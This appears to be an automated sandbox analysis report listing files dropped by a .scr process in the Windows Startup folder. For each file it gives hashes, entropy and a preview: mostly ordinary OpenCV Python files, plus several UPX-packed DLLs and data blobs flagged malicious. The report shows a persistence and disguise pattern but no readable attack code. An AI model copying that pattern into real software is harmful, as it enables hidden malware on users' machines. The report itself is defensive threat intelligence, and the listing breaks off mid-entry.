                                                                                                    Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2229248
                                                                                                    Entropy (8bit):7.999624406237195
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:49152:IbSlg7EtPbwG7Qtugc58UQG/0ym73KDYo/6cUWnyO:cSCkwG7Gub8URsF6YoPUE
                                                                                                    MD5:B3ADED1526439F1938D4D976493EF600
                                                                                                    SHA1:0138AE2EC0FAE83F8644A06C0EAD66D437BE714D
                                                                                                    SHA-256:8CBF7C62F13D73236FDCE5BE0EF642F197D41B1C3A0F96094109E56B3A09099B
                                                                                                    SHA-512:5E146DC71578C97A95D3E25EABB5ADD6B84903D0A40035162F9B48F454C4648AA3AC531BAFFDA36F5BD0ECF52903C6F7CEC8B7FE503B21BF29C7BDF821A6DDE3
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.b.6...6...6...?..$...&9..4...&9..2...&9..>...&9..'...}...8...Y<..5...6...2...~8..I...6.......~8..7...~8..7...Rich6...........PE..d......g.........." ...)..".......V.0wx...V...................................x...........`...........................................x.......x.............. s...............x.$...........................H.x.(.....x.@...........................................UPX0......V.............................UPX1......"...V...!.................@...UPX2..........x.......!.............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6793
                                                                                                    Entropy (8bit):4.966446669677776
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cHqnQbu/3aOjcEYIL9GE6AUmZris46/B5aVOQOo2/nH/h5M966GMBWtReWE3uSI3:2qQYaOjIKtc6/Bb/H/h2BWtc93k
                                                                                                    MD5:6F043AFF1EDD20D3C9D6398F936FBF58
                                                                                                    SHA1:7149D2D20E1EB8C10C5D2BDB8EDA23551FC82650
                                                                                                    SHA-256:957A91BFD98FFB07A10CD789B7C5C46806568476B61E34C7AD56A00092B981A5
                                                                                                    SHA-512:7358DBA479899DBC3AFB955903820D2A7A54B9C398BF5D4565C8DC044241821EDD621D7416862AF396DB4216373B1E8AAC00EB78046FCC3CC2396AA02CD6947B
                                                                                                    Malicious:false
                                                                                                    Preview:'''..OpenCV Python binary extension loader..'''..import os..import importlib..import sys....__all__ = []....try:.. import numpy.. import numpy.core.multiarray..except ImportError:.. print('OpenCV bindings requires "numpy" package.').. print('Install it via command:').. print(' pip install numpy').. raise....# TODO..# is_x64 = sys.maxsize > 2**32......def __load_extra_py_code_for_module(base, name, enable_debug_print=False):.. module_name = "{}.{}".format(__name__, name).. export_module_name = "{}.{}".format(base, name).. native_module = sys.modules.pop(module_name, None).. try:.. py_module = importlib.import_module(module_name).. except ImportError as err:.. if enable_debug_print:.. print("Can't load Python code for module:", module_name,.. ". Reason:", err).. # Extension doesn't contain extra py code.. return False.... if base in sys.modules and not hasattr(sys.modules[base], name):..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):748
                                                                                                    Entropy (8bit):5.110506159030977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:WSolITEO+RNIdjcFMlYFXe2LirYKMLFxAe5bHMnQBwmuTD9+sXWeZKMLFxAe5biw:MlY+34jamr0L7Ae5oJP9+oJL7Ae5mU9L
                                                                                                    MD5:E8ED8F25854821C8910BCB8308507DCE
                                                                                                    SHA1:8A3AC32D3DF44794E8A834A6B6A8A1ED3F3AA5F7
                                                                                                    SHA-256:DE28C7B5213CCA148F09469916584611B3D66C1C8C432880259D6A3A92380213
                                                                                                    SHA-512:F3F36EDF288A870F5E1F14F3B1113031721E12F30BF235B0E5385711E2BF7F08D0123E6AB14600AB069D2E692D81B7ABC3692FB69EED34374FEFAB3B24F03D86
                                                                                                    Malicious:false
                                                                                                    Preview:PYTHON_EXTENSIONS_PATHS = [.. LOADER_DIR..] + PYTHON_EXTENSIONS_PATHS....ci_and_not_headless = False....try:.. from .version import ci_build, headless.... ci_and_not_headless = ci_build and not headless..except:.. pass....# the Qt plugin is included currently only in the pre-built wheels..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_PLATFORM_PLUGIN_PATH"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "plugins".. )....# Qt will throw warning on Linux if fonts are not found..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_FONTDIR"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "fonts".. )..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):123
                                                                                                    Entropy (8bit):5.165836377533827
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSxrsr+A6+Ei7/erj5Erj+7IE3KTY5O8nkz6+Eov:arsrFEoidAM3Kk5PkBEy
                                                                                                    MD5:FCB98FFC6E408D714FC0E0555B1FB530
                                                                                                    SHA1:832A187368BED379942A0A6EF77D8057166DF7F6
                                                                                                    SHA-256:D9E401B9A67304D69C48A494A485D106B534E02BF5776211C09F09BD671B295D
                                                                                                    SHA-512:C679EB68F62D4D4361FB55BE7B052FCD3AD85BFF9DFE9ED27AFD7014C992F26851BF02E7A587AA411D08593C69A197603FAD685E976D2948F35240D5F87DC3F8
                                                                                                    Malicious:false
                                                                                                    Preview:import os....BINARIES_PATHS = [.. os.path.join(os.path.join(LOADER_DIR, '../../'), 'x64/vc14/bin')..] + BINARIES_PATHS..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16587776
                                                                                                    Entropy (8bit):7.999578323833516
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:393216:9+KZi3bQ23tzMQvoxc2shNXyDCiE9tLpWK5:9+gaM23tzBmyx
                                                                                                    MD5:503B3E3E4184CBA2F501905D0D277DBB
                                                                                                    SHA1:DA353686EDFDA2C8702D66530EE38D6050A0BDA3
                                                                                                    SHA-256:E4612C6D1FD4ECC82D8D2177E1A68EF142DA9B521A5DC2D41F43C7AD5106C402
                                                                                                    SHA-512:16DCFC10095AFD97C19EF416CE2E72F255166EC4CC6145DE8F2F58F58D54C9236DB579552A73B52FC98E16393819D30F05094C63B3B4082A0D279C1C542E1469
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......k)../H../H../H..B...cH..B...0H..B...H...?.*H.....aH.....VH......H..B...*H..u.5.~K../H..k..B...3H.....=I..=..,H../H..YI......J......H......H......H..Rich/H..........PE..d....{pf.........." .........@......@....................................................`.............................................d1..................pc................................................(..................................................UPX0....................................UPX1...............................@....rsrc....@.......8..................@..............................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73
                                                                                                    Entropy (8bit):4.5164686969838375
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSxrGSCcurj5ErAwGfnJFB:arGSLSdAAb
                                                                                                    MD5:734F2F32C81B5CEDE1098394DAB581B5
                                                                                                    SHA1:E07450D3F1924078DD09E0B1DEA8DD671DFE8801
                                                                                                    SHA-256:F4CE16721ED7F623A4DCC443BA600D1856DB610CB2C3D53C13A8CA028CC68F6D
                                                                                                    SHA-512:C0C9ADD6A1CD47F34C91B12AD369E887CFD28859824D258E1EED0C3495378DD950E214F8A540D66CD555ED8EFC810418DF3F13E09765D24D6FA26B09B44857C0
                                                                                                    Malicious:false
                                                                                                    Preview:import os....haarcascades = os.path.join(os.path.dirname(__file__), "")..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10621
                                                                                                    Entropy (8bit):4.717526275196451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mIntUjnLP6P7B4D7BP7Bb7BewmDraPt0C2Vqed/:m2eBNYraPt0C2V9Z
                                                                                                    MD5:3A4D80801F49E3A13903811C9E59018A
                                                                                                    SHA1:0227B9F1FB7E900777BD8951404075DF2D6D3447
                                                                                                    SHA-256:74F5FD2A142A31B0A4707B70C0BE3637F0FBF8A940EEC4372E7BA87E5A5CEDB8
                                                                                                    SHA-512:F79D2C216008FE8EC1F9C28575776C81B5FAC63B18996803B76B73EAF088800FE4E46B4C18F7CE9730177549FD5402421719FA2B8FFED73EE60EBACAE4D5CCB1
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = ['op', 'kernel']....import sys..import cv2 as cv....# NB: Register function in specific module..def register(mname):.. def parameterized(func):.. sys.modules[mname].__dict__[func.__name__] = func.. return func.. return parameterized......@register('cv2.gapi')..def networks(*args):.. return cv.gapi_GNetPackage(list(map(cv.detail.strip, args)))......@register('cv2.gapi')..def compile_args(*args):.. return list(map(cv.GCompileArg, args))......@register('cv2')..def GIn(*args):.. return [*args]......@register('cv2')..def GOut(*args):.. return [*args]......@register('cv2')..def gin(*args):.. return [*args]......@register('cv2.gapi')..def descr_of(*args):.. return [*args]......@register('cv2')..class GOpaque():.. # NB: Inheritance from c++ class cause segfault... # So just aggregate cv.GOpaqueT instead of inheritance.. def __new__(cls, argtype):.. return cv.GOpaqueT(argtype).... class Bool():.. def __new__(self):..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):271
                                                                                                    Entropy (8bit):4.627093215673309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:SoSvYFyMXS/qdadew7mZ6ALNCpvdYZ4un:kUFuT7mZlCpFw4u
                                                                                                    MD5:EED4002FFE913424133D8F19FDF1C2A8
                                                                                                    SHA1:F232D4C5ACF73885D8E0D70418FB2E1481D9271B
                                                                                                    SHA-256:FF583A5874BE8F848E73C2F61B3A71680995926479C9BC436E6565C5CCE7CA07
                                                                                                    SHA-512:115F32B21E99DEC9B50C766CC685F9387A0D0C1611A41540CA23B71579E2963E04A1E940C6C8F3447A26006DBC45F17013A7FFE97BE620B74F1CF20A21505B8E
                                                                                                    Malicious:false
                                                                                                    Preview:# flake8: noqa..import os..import sys....if sys.version_info[:2] >= (3, 0):.. def exec_file_wrapper(fpath, g_vars, l_vars):.. with open(fpath) as f:.. code = compile(f.read(), os.path.basename(fpath), 'exec').. exec(code, g_vars, l_vars)..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1164
                                                                                                    Entropy (8bit):4.96613832345308
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7TYCO610sctIsPo5k/1i0N0QhKNAhno3oBoIVbOXono6RnZB:gKceCzN0QhKNuniM5iC/r
                                                                                                    MD5:8A38C1B85454BB467D3BE71BC0EE3486
                                                                                                    SHA1:0D4A8B9B136E3A123D3BC38B484086C8AF07A15A
                                                                                                    SHA-256:C44707EA1C76F35518AE572B6C1989D76C2ADA7E850432E41805DFE112D4E306
                                                                                                    SHA-512:94F6E6E8F5CA41677F69487B8C8EF8C2C004250524ECBD46D1407DA47ABEC05D54A765D79E1633EAECF5A3F9815B7A4604E674D6020442A72BC038FECD93DDFA
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = []....import numpy as np..import cv2 as cv..from typing import TYPE_CHECKING, Any....# Same as cv2.typing.NumPyArrayNumeric, but avoids circular dependencies..if TYPE_CHECKING:.. _NumPyArrayNumeric = np.ndarray[Any, np.dtype[np.integer[Any] | np.floating[Any]]]..else:.. _NumPyArrayNumeric = np.ndarray....# NumPy documentation: https://numpy.org/doc/stable/user/basics.subclassing.html......class Mat(_NumPyArrayNumeric):.. '''.. cv.Mat wrapper for numpy array..... Stores extra metadata information how to interpret and process of numpy array for underlying C++ code... '''.... def __new__(cls, arr, **kwargs):.. obj = arr.view(Mat).. return obj.... def __init__(self, arr, **kwargs):.. self.wrap_channels = kwargs.pop('wrap_channels', getattr(arr, 'wrap_channels', False)).. if len(kwargs) > 0:.. raise TypeError('Unknown parameters: {}'.format(repr(kwargs))).... def __array_finalize__(self, obj):.. if obj is Non
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38
                                                                                                    Entropy (8bit):3.968211974414884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1LT2QbQNQ4yL9v:1LT2Q8NQ4yJ
                                                                                                    MD5:C6B0244719659C5EDEC0592AF112032A
                                                                                                    SHA1:6BD926FE0C853A9938BDB5D9537BD88FD1EF5401
                                                                                                    SHA-256:495BD79594CCE174673E372C85C4DD8F4FFDF2B3A73FD4623955B0D55DE0D462
                                                                                                    SHA-512:28D80015309AC1AE19F048E9461D4D04B85CE16B9E68C58D7608351A39B8D3EC0235FCCFD928B0349082C702D890B6C6ABD36B8030A176BF05888AE8C493B545
                                                                                                    Malicious:false
                                                                                                    Preview:from .version import get_ocv_version..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95
                                                                                                    Entropy (8bit):4.525707419533802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JS4iydoKE4yLYfg+4zxNG364yLA9E5HJwv:mIXE4y0YpE6405pwv
                                                                                                    MD5:2D3125F1843A670B9F3229A7BC362816
                                                                                                    SHA1:E884BC3D05E5E732D1308DE67AA5F96BBF4FC69F
                                                                                                    SHA-256:C93A418793FCB15B9B4316C0741B8336740E490E94F3B7D1EBE8CD5F6F23815C
                                                                                                    SHA-512:BFDCF6BFC1D82E3ACAF625B5940CA169784427712F14895FD6CA92CC9C864F1A894FECF97BF2AFA6FC5CF4ABA9738A302D30024BC192F85025989C0D93A8B540
                                                                                                    Malicious:false
                                                                                                    Preview:import cv2......def get_ocv_version():.. return getattr(cv2, "__version__", "unavailable")..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8551936
                                                                                                    Entropy (8bit):7.999971581252399
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:196608:94Lc9tk6+OfCa1hgAnqWYUum/2WRJ4NpF/owVZqmZ6PH:OLMa9OKEhqBU47Rowjo
                                                                                                    MD5:380058D8AB214582E2E92E021806612D
                                                                                                    SHA1:3D770B5814D8169C7B28C23B327B7B1AC0A2BCCB
                                                                                                    SHA-256:8BCB028C3D0E8E2F0C7A6F8815EDA4D01320469004D9D0F1E0C4976C8C63E454
                                                                                                    SHA-512:D78E8386569E052C212CE5679444AF86615435DBB75DAEC8B650B4BDCB8D9F5AFDDF87BDCD3BE3D11219589862DAAE1FE9AF3FEB219BB3385283D3A31E6695F5
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..."...........`G.........p.............................p................ .....................................he......<c..,....`..<....0..............Dg..............................pS..(...................................................UPX0...................................UPX1.............t..................@....rsrc........`.......v..............@...4.24.UPX!.$.._...m..3.*..,g.............$#=...E..[... .s.G9]..;...$....G....a...e^L......[.R.i.(.\zUm..k.#.3.)+."n;I.9..d....., .z.Iy..a.@:...f..L..Q.wv.2.@.....!)1...*%.......OT..n.&.1....K9...L...e.{{...P.........m<-+z...t^..}....7.-w....G...!.X..5...+..4....y....<.%.^....4},.....w^ ..#...=...o....g.P..Bh.T.....GxU.\..$.e..._..Mw....D..)....;zVD...7..8...S....p3..$.....l|.._.#w.-.|.Gd...>...3.]..<....B*..v.Z..l..s...o.........i.V...L=.].h...=J.s....y....yi...>.F.]
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5434
                                                                                                    Entropy (8bit):5.152336645688798
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cuACTXc/yidAKdpJUiA7VDpHGN5RME0Kdc:cKzji+KsRcRME0N
                                                                                                    MD5:BAD2104D74F1DAF8E79AC3BC0FA5A3B1
                                                                                                    SHA1:F9D2CAFE013C5A3938487065F598515FC2B3FA17
                                                                                                    SHA-256:9DE1E504724D2FF1CFF305E7EFDD8D09A8D636734149AA4AF9DDF406975119B9
                                                                                                    SHA-512:0098F8A91A365D927BA5B25C5B07859B800F0AF876AE43D56685CF839C53E8CD115F34303B897310CA86980D1543F5A40C15BD784F81169AAC42B1E9A0AC2956
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = [.. "IntPointer",.. "MatLike",.. "MatShape",.. "Size",.. "Size2f",.. "Scalar",.. "Point",.. "Point2i",.. "Point2f",.. "Point2d",.. "Point3i",.. "Point3f",.. "Point3d",.. "Range",.. "Rect",.. "Rect2i",.. "Rect2f",.. "Rect2d",.. "Moments",.. "RotatedRect",.. "TermCriteria",.. "Vec2i",.. "Vec2f",.. "Vec2d",.. "Vec3i",.. "Vec3f",.. "Vec3d",.. "Vec4i",.. "Vec4f",.. "Vec4d",.. "Vec6f",.. "FeatureDetector",.. "DescriptorExtractor",.. "FeatureExtractor",.. "GProtoArg",.. "GProtoInputArgs",.. "GProtoOutputArgs",.. "GRunArg",.. "GOptRunArg",.. "GMetaArg",.. "Prim",.. "Matx33f",.. "Matx33d",.. "Matx44f",.. "Matx44d",.. "GTypeInfo",.. "ExtractArgsCallback",.. "ExtractMetaCallback",.. "LayerId",.. "IndexParams",.. "SearchParams",.. "map_string_and_string",.. "map_string_and_int",.. "map_string_and_vector_size_t",.. "map_string
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):344
                                                                                                    Entropy (8bit):4.438685267245838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:1zBhJDyTH2XE2OTH2XRxEMGMBrMhWcROEoiZAIfH2Xc10F9vSumHcROEoiZWf:1zBHyLkOLejrMYccRIfh0FNSfcct
                                                                                                    MD5:952D77A31C0171AE90C0086AA8E3FCC7
                                                                                                    SHA1:000D22FD5A2545CEFBBF294D63415E82E232820A
                                                                                                    SHA-256:2B16990B35B569AF1CA7239DC10F7B24EC62F27A46626B1E2F1271D2E1AA3554
                                                                                                    SHA-512:36E5BEA12CDF8AE29D737F7062923AE4A1DBDB2C98904F9A35559222119FAFA836C4A7553F5CD9F5639043183155F5E93DFE731EBCF385349A8E4CA72D2E92B6
                                                                                                    Malicious:false
                                                                                                    Preview:from collections import namedtuple....import cv2......NativeMethodPatchedResult = namedtuple("NativeMethodPatchedResult",.. ("py", "native"))......def testOverwriteNativeMethod(arg):.. return NativeMethodPatchedResult(.. arg + 1,.. cv2.utils._native.testOverwriteNativeMethod(arg).. )..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97
                                                                                                    Entropy (8bit):4.601309915764778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:K2T2QxVLVLLyJRi+gI/aIysi+gIgZPGXV:K2TbTh6JvgMaDR1CV
                                                                                                    MD5:11D506AD07970539A2069E87F488C60E
                                                                                                    SHA1:ECFC23D272E8871943594CDB6A6A9FA6651BCAF9
                                                                                                    SHA-256:1DE383F5662831E69BDDDC21F9D1E4A2A8E806F57F7F69669103DF64D5DB4083
                                                                                                    SHA-512:8E74CFFD8064A6B1406AE250E81F93E6F4860FA72F63E7E0A0AF6F7261327ACD6F0C30B5C0C9DECE33E1481E1774968C8FAA85C52416D114C713DF681EB791AC
                                                                                                    Malicious:false
                                                                                                    Preview:opencv_version = "4.10.0.84"..contrib = False..headless = False..rolling = False..ci_build = True
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1635096
                                                                                                    Entropy (8bit):7.9528782228345625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:r6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:r6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
                                                                                                    MD5:63EB76ECCFE70CFF3A3935C0F7E8BA0F
                                                                                                    SHA1:A8DD05DCE28B79047E18633AEE5F7E68B2F89A36
                                                                                                    SHA-256:785C8DDE9803F8E1B279895C4E598A57DC7B01E0B1A914764FCEDEF0D7928B4E
                                                                                                    SHA-512:8DA31FA77EAD8711C0C6FFEDCEF6314F29D02A95411C6AACEC626E150F329A5B96E9FDEAE8D1A5E24D1CA5384AE2F0939A5CC0D58EB8BDBC5F00E62736DCC322
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29968
                                                                                                    Entropy (8bit):7.6778753009761065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Pp/6aepjG56w24Up3p45YiSyvkIPxWEqG:1A154spK7SytPxF
                                                                                                    MD5:BE8CEB4F7CB0782322F0EB52BC217797
                                                                                                    SHA1:280A7CC8D297697F7F818E4274A7EDD3B53F1E4D
                                                                                                    SHA-256:7D08DF2C496C32281BF9A010B62E8898B9743DB8B95A7EBEE12D746C2E95D676
                                                                                                    SHA-512:07318C71C3137114E0CFEC7D8B4815FD6EFA51CE70B377121F26DC469CEFE041D5098E1C92AF8ED0C53B21E9C845FDDEE4D6646D5BD8395A3F1370BA56A59571
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):228120
                                                                                                    Entropy (8bit):7.928690911942244
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:imlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:Z+t6Ce6XKtSHYomk2
                                                                                                    MD5:7E87C34B39F3A8C332DF6E15FD83160B
                                                                                                    SHA1:DB712B55F23D8E946C2D91CBBEB7C9A78A92B484
                                                                                                    SHA-256:41448B8365B3A75CF33894844496EB03F84E5422B72B90BDCB9866051939C601
                                                                                                    SHA-512:ECEDA8B66736EDF7F8E7E6D5A17E280342E989C5195525C697CC02DDA80FD82D62C7FD4DC6C4825425BAE69A820E1262B8D8CC00DBCD73868A26E16C14AC5559
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4942860
                                                                                                    Entropy (8bit):7.9999604225624825
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:98304:Gi/QDzL8whS0qbWYz+6M+gAXi2Afts4ZFm4kqBqTzGk89XVF6N:DQY70qDz+H+gdts4iLGk+i
                                                                                                    MD5:4CCCCDC323A25B9214957A654F0AE919
                                                                                                    SHA1:6F93A6B5A0B32651C0D4E75F74D672673044B208
                                                                                                    SHA-256:8CF115593A843E4C3B110FCC239E5507A95CC5E96EACD0F8D889C86418837332
                                                                                                    SHA-512:4812110B3D0291971F3288F23802B96C77651FE1903C57F68841C0D69FE5EDF1944C7E5A7E4B620193C17F81BBA86D5BA653BE004D9E5A21D3F6D708244B92D5
                                                                                                    Malicious:true
                                                                                                    Preview:.i._`.......x0..}..zAo.Y.nP'7......@sBexT%\.s.I.LwQ....f..m.|z4}..W)0....Q..=.../...!.w.7.|..v....#.....m...).....+.Be.Z..8.9.....V^.&...y`..koTI.U.QZO.6...~..'t.Q.9..:[.&...Ik7y..e..Xq.U..6....-...Lxx.V.....X.?..$3O.f...^.'.O.W......C)..P......9.....fP.....k$..c#,2A.EV..DOb.D..O.O.. ...b.W...V..d!....E0vI\......s.H.)..@I.i....[.1`.[....*.A.$....J..eN..!........b@.0"Sb..E...Ah.`....<.....::..$.....a..hnq5{.q...P..D....g.......*..4......L.V. ...EO._]6.}^.S...3.....D..p.um..s....>..M.3ij..h:4.jNv.0...e..o...0......n$....3{.....{...X.2}.W/x...DG.A`k....{..o.F....+.."..._6.\b...P?..X....P\.../k.81QKa.C4..M...<].....X..K.2..W.s0Kt....+@.z.?..U.-Xb...L.Z...uM....h...E(-.~rU..$..z...gl}..xX..R...n.kK.._N.....M:7.....L.../,]:Pr)..Jx...6%.U..e.%Y4FG.N....6.....%3.............R.......s.....!t#fwA_I...F38....d1.nTj9T...=^.c..)..>...L}..o).5.B....=h.-...?.[p%\.2.r...X.`....$+c..........G_.?..@B..l..j...Y..\.].[:./...,..J..1....X.2..i...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Mn:M
                                                                                                    MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                    SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                    SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                    SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                    Malicious:false
                                                                                                    Preview:pip.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
